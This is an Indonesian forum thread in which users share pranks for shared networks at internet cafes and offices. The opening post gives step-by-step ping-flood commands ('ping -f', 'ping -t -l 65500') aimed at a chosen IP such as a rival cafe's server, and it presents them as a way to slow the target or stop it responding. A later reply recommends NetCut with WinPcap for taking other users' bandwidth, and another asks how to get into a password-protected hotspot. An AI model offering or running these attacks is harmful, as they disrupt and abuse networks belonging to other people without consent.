iseng di warnet atau di kantor yg satu link

Topik sebelumnya Topik selanjutnya Go down

iseng di warnet atau di kantor yg satu link

Post by kaisar_Devil on Sun Apr 26, 2009 7:36 pm

- cari IP yg akan dijadikan korban. Bisa IP lokal server kantor anda, warnet pesaing anda, atau IP apapun
- buka command prompt
- ketik ping -f [alamat IP yg jadi target]

misal : ping -f 192.168.0.1 (biasanya IP server lokal)

coba amatin komputer / system target pasti mengalami perubahan respond, entah itu lambat atau bahkan no respond sama sekali.

Intinya dengan command tsb ( ping -f = ping flooding ) akan mengurangi porsi bandwith kompi tersebut scr perlahan tp pasti. maaf klo cupu jangn dikasih ini ya



klo gni gmn om ivan...:
Code: Select all
ping -t -l 65500 192.168.1.5


flag -t akan mengirim paket secara terus menerus, sampe ada perintah Ctrl+C dari keyboard
flag -l menentukan besar paket yg dikirim...

atau bgini kali ya, biar lebih seru :
Code: Select all
ping -f -t -l 1000 192.168.1.5


paketnya ane set 1000, coz kalo ane kasih 2000, yang keluar malah :
Packet needs to be fragmented but DF set.



selamat mnecoba resiko di tanggung sendiri

kaisar_Devil
New Comer
New Comer

Jumlah posting : 6
Join date : 26.04.09

Lihat profil user

Kembali Ke Atas Go down

Re: iseng di warnet atau di kantor yg satu link

Post by kristz07 on Wed Jul 01, 2009 8:13 pm

makasi nih pencerahannya ...

kristz07
Administrator
Administrator

Jumlah posting : 890
Join date : 20.04.08
Age : 28
Lokasi : tasikmalaya

Lihat profil user

Kembali Ke Atas Go down

Re: iseng di warnet atau di kantor yg satu link

Post by CangCingCeng on Mon Jul 06, 2009 7:46 pm

Very Happy iseng bin jail nih........

CangCingCeng
Junior
Junior

Jumlah posting : 11
Join date : 30.05.09

Lihat profil user

Kembali Ke Atas Go down

Re: iseng di warnet atau di kantor yg satu link

Post by networker on Thu Nov 12, 2009 5:45 pm

ada yang lebih iseng bin jail deuih bos Very Happy pake software namanya netcut and jangan lupa buat installkan packet capture softwre kayak winpcap terus restart komputer terus jalankan si netcut itu... tu software fungsinya buat ambil bw orang ke komputer kita.. cocok buat yang lagi hotspotan dan benwit nya kena limit ...

networker
Junior
Junior

Jumlah posting : 27
Join date : 06.11.08

Lihat profil user

Kembali Ke Atas Go down

Re: iseng di warnet atau di kantor yg satu link

Post by katana22 on Sat Apr 03, 2010 8:26 pm

hahahha... tambah aja ilmu jahil gw Very Happy Very Happy Very Happy Very Happy Laughing

katana22
New Comer
New Comer

Jumlah posting : 2
Join date : 03.04.10

Lihat profil user

Kembali Ke Atas Go down

Re: iseng di warnet atau di kantor yg satu link

Post by junardi on Fri Jul 22, 2011 10:06 am

Met siang bos salam kenal gue zhuned ank pendtang baru yg ingin mengtahui dan mempelajari gimana caranya memasuki hotspot warnet yg mempunyai user name end pasworg login..............he..he....eeee

junardi
New Comer
New Comer

Jumlah posting : 2
Join date : 22.07.11

Lihat profil user

Kembali Ke Atas Go down

Re: iseng di warnet atau di kantor yg satu link

Post by Sponsored content Today at 2:49 am


Sponsored content


Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik